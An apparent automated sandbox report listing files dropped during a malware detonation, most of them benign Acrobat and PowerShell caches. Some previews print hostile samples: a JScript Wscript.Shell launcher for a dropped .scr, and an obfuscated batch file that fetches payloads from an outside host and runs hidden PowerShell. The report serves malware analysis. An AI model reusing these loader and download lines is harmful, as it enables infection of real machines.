                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):1090
                                                                          Entropy (8bit):5.667493159216727
                                                                          Encrypted:false
                                                                          SSDEEP:24:Yv6XB/JhwamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSmS:YvE/Jh2BgkDMUJUAh8cvMmS
                                                                          MD5:E8AD4B6C9BD26D1990E27C554615231C
                                                                          SHA1:ED2B4763038F43EC99B5D1436B91452EC93C775F
                                                                          SHA-256:A3D975AE757F45157AE4D4DA41304683FA711B705F2BC5BC0BD448E4BC7BFCA1
                                                                          SHA-512:64C469273450EA21023CAFDF6B1A9E7D28D9F8F1979F7ADF16F710291A6AB246BD669EC3337F85F22FA9B0D4FE89B3D923C3E74AA6B6B441D8F8FA85A433F541
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"62538152-f2b9-4c57-81d9-0d3ef568cfc4","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734200276243,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):286
                                                                          Entropy (8bit):5.260299531243386
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXBjM2vB3/dVlPIHAR0Y0DoAvJfshHHrPeUkwRe9:YvXKXBQ2vR/ZwHADGUUUkee9
                                                                          MD5:59EFDB37992698890957AE4D57EEDCBB
                                                                          SHA1:C78ED436F0A22AEDAF52ED979FB24D9959CD0579
                                                                          SHA-256:4DBC6434164E33306146A7589D5EDBD2CFB4EE5BC6A5265908FC51D54F260DD2
                                                                          SHA-512:4D1E4406F5CFDFDF550103AE06289FA54494A2290DEBD5D84C495C78AAE2299E4C203E9C4A3693E5FD483B78C42D053DE006F1B7622AFB944F3187B8ED26287A
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"62538152-f2b9-4c57-81d9-0d3ef568cfc4","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734200276243,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):282
                                                                          Entropy (8bit):5.2719722613750015
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXBjM2vB3/dVlPIHAR0Y0DoAvJTqgFCrPeUkwRe9:YvXKXBQ2vR/ZwHADGTq16Ukee9
                                                                          MD5:BE5E926FF1EBAE9881BCE71594D23225
                                                                          SHA1:CF9EB31FE0C3C5E43B57BA7D0CCA8A7F2B0A450F
                                                                          SHA-256:8FEB6A5F28071E9203FB136B2A60318234F3733B5A1276009FB19F498D64CDDE
                                                                          SHA-512:898C1A67F13ED74F51755B50D7BA3A7EF3A3F327D20B2040CC9DCD21B99D2F4D98E90E9FB4EC87527C6945BB94166B4DD4C7AC85B66A6E4F2CDB87B7098D394D
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"62538152-f2b9-4c57-81d9-0d3ef568cfc4","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734200276243,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):4
                                                                          Entropy (8bit):0.8112781244591328
                                                                          Encrypted:false
                                                                          SSDEEP:3:e:e
                                                                          MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                          SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                          SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                          SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                          Malicious:false
                                                                          Preview:....

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):2814
                                                                          Entropy (8bit):5.136032668143788
                                                                          Encrypted:false
                                                                          SSDEEP:24:Y4gXN6Iah3ay1T/BZe+/tDa06x2BOn6jUKP66ypljxcj0Sj9eAmo27P2LSjXCTSu:Y4A0Ta065xupMPB0+JvQTU9y
                                                                          MD5:26EF2714CD2947F54225F18653C821BC
                                                                          SHA1:3C71499EA8D4FCA2F48B27CA2F632C8CE9F85DF6
                                                                          SHA-256:66D55FAC9B3E65E58B56BFCF140151A52F4F4714619BC61CF30DDF69AA60101E
                                                                          SHA-512:270C1BEB13C7DD226704404C7EBD8204063626D9DACD5FEB571A9252455DA64BE4D3A1DC3CF805D887B59A7E99CBA7BBCA3F5CC422DFB5AD596FBCFC9DECA24C
                                                                          Malicious:false
                                                                          Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"138fc817ba3389373bef3056c4af4c83","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734026845000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"dc425f2ed9957258b4e70d4da13721be","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734026845000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"7c246e1daa4daf418e101cba1684bbcc","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734026845000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"b18cd7fa5b412cc7d46764a2dee0a6bc","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734026845000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"f713aaaa1e10e27ff23ace920f2a4d55","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734026845000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"9d0cbb4862994ceafdef6ad2d1d6c54d","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                          Category:dropped
                                                                          Size (bytes):12288
                                                                          Entropy (8bit):1.3184749402599047
                                                                          Encrypted:false
                                                                          SSDEEP:24:TLKufx/XYKQvGJF7urs9Ohn07oz7oF0Hl0FopUEiP66UEiPbnPnNknNMeg/ktqV9:TGufl2GL7ms9WR1CPmPbPahgGypilICA
                                                                          MD5:D0CADB749013EEF2C448C5A253B5F661
                                                                          SHA1:CE12EED706C56D80601EFA16FB36ECECAD69789E
                                                                          SHA-256:0346FB46B3E0654C82EC3772C9BF1B6C4524E367936F8F80D6510D54E3BF3369
                                                                          SHA-512:693392C6C36BC129E4EE41660827A0F4EA50CCC0BD933DADFA2E3CAB86BE167DFCDD2C56A99DB9B2B3C3FBC0C07B3CDB508747ABB9FD1A2AD6D24802021CCD51
                                                                          Malicious:false
                                                                          Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:SQLite Rollback Journal
                                                                          Category:dropped
                                                                          Size (bytes):8720
                                                                          Entropy (8bit):1.779208564091413
                                                                          Encrypted:false
                                                                          SSDEEP:24:7+t1lhn07oz7oF0Hl0FopUEiP66UEiPbnPnNknNMeg/k4qVpaVrScVr0InTqLhxj:7MiWR1CPmPbPahg/ypilI2qFl2GL7ms5
                                                                          MD5:811F56E3332017FB84E1ACAF3D0A636E
                                                                          SHA1:6380500462775AE33EC9C0E5F61DFE9C03FDBF14
                                                                          SHA-256:B4C558E9E6A73F9C509F85691C0385429BA27DC72729C8FD3533F362FA183289
                                                                          SHA-512:7D3D96A563E8D1C57D53D05B0EB5E9A865B094C151006EBF761A697A34D8BAF1113297A7405605D4E0630FBBB457AEED15E45638D0F0C09E92E11C32B6B3BC72
                                                                          Malicious:false
                                                                          Preview:.... .c......e............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................^..^.^.^.^.^.^.^.p.p.p.p.p.p.p.p.p.p..........................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):66726
                                                                          Entropy (8bit):5.392739213842091
                                                                          Encrypted:false
                                                                          SSDEEP:768:RNOpblrU6TBH44ADKZEgdVxTHqzsKI/EHO4YxGX4U3ENYyu:6a6TZ44ADEzxTHqzstW4UUNK
                                                                          MD5:80766FB375EE6A3A8C3DC2828209EA36
                                                                          SHA1:53E79AFED6F262DDB44BFC0F7F23752E559C3095
                                                                          SHA-256:671F60502794606B68246EB11B92EB04240BB76990701500BDAE212190D07448
                                                                          SHA-512:3F2E8D4E3681CC44052B8B3BAA01D38E07F59ADA713365C604F485FACB9027519A8F4C5EA6FC24BD316071A7582E43E3289A70929AC780075F1B57AD541F4C37
                                                                          Malicious:false
                                                                          Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                                                                          C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Temp\220239\Carter.pif
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):186
                                                                          Entropy (8bit):4.764657884065307
                                                                          Encrypted:false
                                                                          SSDEEP:3:RiMIpGXIdPHo55wWAX+TSyCVVh4EkD5mJKEufLOksaYuWGplZo5uWAX+TSyCVVhj:RiJBJHonwWDmLJkDjEYRswWGrywWDmLj
                                                                          MD5:59F6C76FD5648424A5A99E0BEFCE44D4
                                                                          SHA1:99A3B568CD90CC70959751D87285D7F44C6E49C7
                                                                          SHA-256:3D5BBE7F492DB67D8EE035A56F85CEC0DB56B4CC9143A949ED1FA7E832E387F7
                                                                          SHA-512:C2846B3CD02671E15DD942690476D5C802ECBFE3861CA352C3080AB3576164C14726B679E9DBC2352C1BD8F71DEBEB01E3AB48E8F301DD9D56FA0B0BD0C59C24
                                                                          Malicious:true
                                                                          Preview:new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\CloudSynergy Solutions\\DanielPulse.scr\" \"C:\\Users\\user\\AppData\\Local\\CloudSynergy Solutions\\R\"")

                                                                          C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Temp\220239\Carter.pif
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):893608
                                                                          Entropy (8bit):6.62028134425878
                                                                          Encrypted:false
                                                                          SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                          MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                          SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                          SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                          SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                          Joe Sandbox View:
                                                                          • Filename: c2.hta, Detection: malicious, Browse
                                                                          • Filename: c2.hta, Detection: malicious, Browse
                                                                          • Filename: FwR7as4xUq.exe, Detection: malicious, Browse
                                                                          • Filename: InsertSr.exe, Detection: malicious, Browse
                                                                          • Filename: vqMMwqCFZQ.exe, Detection: malicious, Browse
                                                                          • Filename: fT0L8msd6q.exe, Detection: malicious, Browse
                                                                          • Filename: fT0L8msd6q.exe, Detection: malicious, Browse
                                                                          • Filename: qaHUaPUib8.exe, Detection: malicious, Browse
                                                                          • Filename: qaHUaPUib8.exe, Detection: malicious, Browse
                                                                          • Filename: eddzD2MA12.exe, Detection: malicious, Browse
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\CloudSynergy Solutions\R

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Temp\220239\Carter.pif
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):257339
                                                                          Entropy (8bit):7.999363363076799
                                                                          Encrypted:true
                                                                          SSDEEP:6144:duwZYX3zopteLfBJWbfnge8mKtNAUe+v8iswCJziP7sVf:gdX3zsteLfSzHstXLXswMOsN
                                                                          MD5:606D3FBBD2B3F54B73E2B049EBC1CB66
                                                                          SHA1:E3D039B3F84158DBC882D62614AEC3A66766509F
                                                                          SHA-256:4176B81C10024AA77D43BF06A7EAC6B5EB40427B11369C9051DCB4D1D102D437
                                                                          SHA-512:35B4F513508C7231AFAB55850ECD954E147839B45E7B0C1F73D983AD0AFF072E582E3CB08A9B288A0FC17E277CA8A80949A0DB9A8488F6D603F390307213D402
                                                                          Malicious:false
                                                                          Preview:>I.......<6...P.a... ..m.u.!'S7ba...d.....<.j..Rt.|...P.<.....X.h5...@......./.p...~.Vx....m...J.......qQC..K\%..././.R...-....o........J.5....HF.e.....MJR...A..sC.V......*.U..e.}.@.......l.....j......tt.G..Z...7\.3.a.TK[..g.9.W..Nl.o...%O.o.;T.6{...Np.-M....vF.y'.#..y&..w...W.b..X..B_..Y.4.E...W.5I(d8.P...t.N..]....T.y.v~.7...p.0yQ...<...'-)?K.w.o.[....W...f._3,!M..~..Vi.........\8xl.)8......y...Rr.2APH.}.Y.^.W..:......p.o.../....c.\../ea..Vi..@?....P...6Y....C^..a...=...%.m.^..R..J.h....4..&{... ...u....K.@~.$..PC....t....s...@.....0..@.5*l..i<9f.....2...$w........3....Orfep......M.$...l.q.&G.0...b.@.C.Y...4.......t.E}.K..?'Q./..Eg.l]e...AXT....YJgG~.<.y......S.=&7B..S..>.....yc.W..*..u..*.a...o.s..Y.......6..{......OEq.l_.:.."\2b.nc#.-|Cdg.L.........J.8{| ..5...-.h....!.... f.W..p.^...*.&..].S6..=yj.....j.5[.). ^..L...n,..........Z.......M...<.:T8.....C,..'i.zp...z...9z...sq...*b.E^.4=~.f..p.qgv......^.".c... ...eg..="..n

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\c[1].bat

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\mshta.exe
                                                                          File Type:ASCII text, with very long lines (858), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):3432
                                                                          Entropy (8bit):5.234062070088092
                                                                          Encrypted:false
                                                                          SSDEEP:96:/TdUe5HQK36ughbWko0bb3qiek2GsMfTqjLgA784kzc:/1iC6/Hok3ck2m+gA4pc
                                                                          MD5:D549E854FB2AAB68C75932BCF3A665B4
                                                                          SHA1:8A6B197876F71629D0D9203D07ECCE9AF74ED23B
                                                                          SHA-256:1EC09B7E61FA833273AC18D88FAC6A4A170EB9162E9EB22CF792501A5ADB80FC
                                                                          SHA-512:09DC0CA4747C9889E91444D81F169F23F8D06F4E4CCA8100DB0D6EB2CD7C0CD8B8B1A43F02CB3D32AD41A0B3FAEAA5F8CD51AE2099C2B47FEF2DD56DB6C6F6C7
                                                                          Malicious:true
                                                                          Preview:@%GhaE%e%QON%c%oVNlxhS%h%Ycc%o%TZSGZdTzsg% %mCRp%o%mYsfZpXBuP%f%dejTMv%f%rOYSefEO%..set url=https://myguyapp.com/msword.zip..s%fYUsbno%e%mHFqzLlvkW%t%hUBvKOQtW% %BtaDrsJcK%u%bwj%r%bjb%l%cpsWTx%=%CMyfaI%h%NNDC%t%SZG%t%sg%p%wytdXsH%s%XLfYRhO%:%bwaXJSZcr%/%vUI%/%K%m%MCJQ%y%wuBhlDQq%g%bvZ%u%uMfDTf%y%HvowO%a%g%p%gW%p%WuVdNidl%.%J%c%mQbubjWlWA%o%JHjbKI%m%SLrrGw%/%kgMFGJDia%m%iY%s%CyXf%w%AOQZxDh%o%JaMNppS%r%OFHHQzh%d%ogNI%.%CWIe%z%NvLL%i%nUqshO%p%ol%..set url2=https://myguyapp.com/f.pdf..s%lLMxI%e%E%t%HmFSG% %eShSGJ%u%ffAbYQ%r%jKPqgaqto%l%EMjcmqMfca%2%FoaxIpOlBa%=%tFP%h%QfOUPNjO%t%eJQcBi%t%T%p%E%s%cEBinqC%:%gpBCsoCKj%/%O%/%Sc%m%jxCVyoV%y%xupSDw%g%c%u%ZXfcFhQc%y%MTizciab%a%HajpQ%p%egxXS%p%GbeXqb%.%v%c%sOvJGeIi%o%iR%m%ghuPHIK%/%IyQ%f%Hy%.%jbNkg%p%wZavCJ%d%u%f%GZZx%..p%lq%o%rKw%w%rccL%e%MoQtMwm%r%KyfpjVP%s%UeGGJKVJuc%h%OLItsAkTl%e%SvXHsfY%l%xNn%l%qprygNiJ% %u%-%trOPn%W%riAGUqdCY%i%XJzeNiO%n%dADaL%d%vwEhbsFtTh%o%NVBUHaBrg%w%KgiWKgQqo%S%uUzQb%t%bckc%y%yQMRkxNH%l%RCyA%e%vwwwFI% %nLhuAftFS%H%SMhVFx%

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):21979
                                                                          Entropy (8bit):5.049158677118914
                                                                          Encrypted:false
                                                                          SSDEEP:384:aPVoGIpN6KQkj2qkjh4iUxehQVlardFWgxOdB2tAHkDNXp5pNSSme+vOjJiYo0ik:aPV3IpNBQkj2Ph4iUxehYlardFWgxOdm
                                                                          MD5:E85ADBB7806D6C2B446681F25E86C54E
                                                                          SHA1:7945DA1DD2CC4F96AD9DD6E40803842C3497B0C0
                                                                          SHA-256:1DE8C1E231A1C77FB42123C0362070540F9692F0A3E4EA5141C6F8EE8DE8EBF5
                                                                          SHA-512:D60A6998458E9D2FB6F6345306DA7CB679E8A8202270B1C31519FFD017C102D7B46A7FD98011577784E2ADA33C0FCCA138EA1BB68C4260E45FA3BAFC307A60D3
                                                                          Malicious:false
                                                                          Preview:PSMODULECACHE.......CB.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem...............?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet..........?T.z..C...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\iSCSI\iSCSI.psd1........Register-IscsiSession........New-IscsiTargetPortal........Get-IscsiTarget........Connect-IscsiTarget........Get-IscsiConnection........Get-IscsiSession........Remove-IscsiTargetPortal.....

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):64
                                                                          Entropy (8bit):0.34726597513537405
                                                                          Encrypted:false
                                                                          SSDEEP:3:Nlll:Nll
                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                          Malicious:false
                                                                          Preview:@...e...........................................................

                                                                          C:\Users\user\AppData\Local\Temp\220239\Carter.pif

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:modified
                                                                          Size (bytes):893608
                                                                          Entropy (8bit):6.62028134425878
                                                                          Encrypted:false
                                                                          SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                          MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                          SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                          SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                          SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                          Joe Sandbox View:
                                                                          • Filename: c2.hta, Detection: malicious, Browse
                                                                          • Filename: c2.hta, Detection: malicious, Browse
                                                                          • Filename: FwR7as4xUq.exe, Detection: malicious, Browse
                                                                          • Filename: InsertSr.exe, Detection: malicious, Browse
                                                                          • Filename: vqMMwqCFZQ.exe, Detection: malicious, Browse
                                                                          • Filename: fT0L8msd6q.exe, Detection: malicious, Browse
                                                                          • Filename: fT0L8msd6q.exe, Detection: malicious, Browse
                                                                          • Filename: qaHUaPUib8.exe, Detection: malicious, Browse
                                                                          • Filename: qaHUaPUib8.exe, Detection: malicious, Browse
                                                                          • Filename: eddzD2MA12.exe, Detection: malicious, Browse
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\220239\F

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):257339
                                                                          Entropy (8bit):7.999363363076799
                                                                          Encrypted:true
                                                                          SSDEEP:6144:duwZYX3zopteLfBJWbfnge8mKtNAUe+v8iswCJziP7sVf:gdX3zsteLfSzHstXLXswMOsN
                                                                          MD5:606D3FBBD2B3F54B73E2B049EBC1CB66
                                                                          SHA1:E3D039B3F84158DBC882D62614AEC3A66766509F
                                                                          SHA-256:4176B81C10024AA77D43BF06A7EAC6B5EB40427B11369C9051DCB4D1D102D437
                                                                          SHA-512:35B4F513508C7231AFAB55850ECD954E147839B45E7B0C1F73D983AD0AFF072E582E3CB08A9B288A0FC17E277CA8A80949A0DB9A8488F6D603F390307213D402
                                                                          Malicious:false
                                                                          Preview:>I.......<6...P.a... ..m.u.!'S7ba...d.....<.j..Rt.|...P.<.....X.h5...@......./.p...~.Vx....m...J.......qQC..K\%..././.R...-....o........J.5....HF.e.....MJR...A..sC.V......*.U..e.}.@.......l.....j......tt.G..Z...7\.3.a.TK[..g.9.W..Nl.o...%O.o.;T.6{...Np.-M....vF.y'.#..y&..w...W.b..X..B_..Y.4.E...W.5I(d8.P...t.N..]....T.y.v~.7...p.0yQ...<...'-)?K.w.o.[....W...f._3,!M..~..Vi.........\8xl.)8......y...Rr.2APH.}.Y.^.W..:......p.o.../....c.\../ea..Vi..@?....P...6Y....C^..a...=...%.m.^..R..J.h....4..&{... ...u....K.@~.$..PC....t....s...@.....0..@.5*l..i<9f.....2...$w........3....Orfep......M.$...l.q.&G.0...b.@.C.Y...4.......t.E}.K..?'Q./..Eg.l]e...AXT....YJgG~.<.y......S.=&7B..S..>.....yc.W..*..u..*.a...o.s..Y.......6..{......OEq.l_.:.."\2b.nc#.-|Cdg.L.........J.8{| ..5...-.h....!.... f.W..p.^...*.&..].S6..=yj.....j.5[.). ^..L...n,..........Z.......M...<.:T8.....C,..'i.zp...z...9z...sq...*b.E^.4=~.f..p.qgv......^.".c... ...eg..="..n

                                                                          C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Temp\220239\Carter.pif
                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):65440
                                                                          Entropy (8bit):6.049806962480652
                                                                          Encrypted:false
                                                                          SSDEEP:768:X8XcJiMjm2ieHlPyCsSuJbn8dBhFwlSMF6Iq8KSYDKbQ22qWqO8w1R:rYMaNylPYSAb8dBnsHsPDKbQBqTY
                                                                          MD5:0D5DF43AF2916F47D00C1573797C1A13
                                                                          SHA1:230AB5559E806574D26B4C20847C368ED55483B0
                                                                          SHA-256:C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
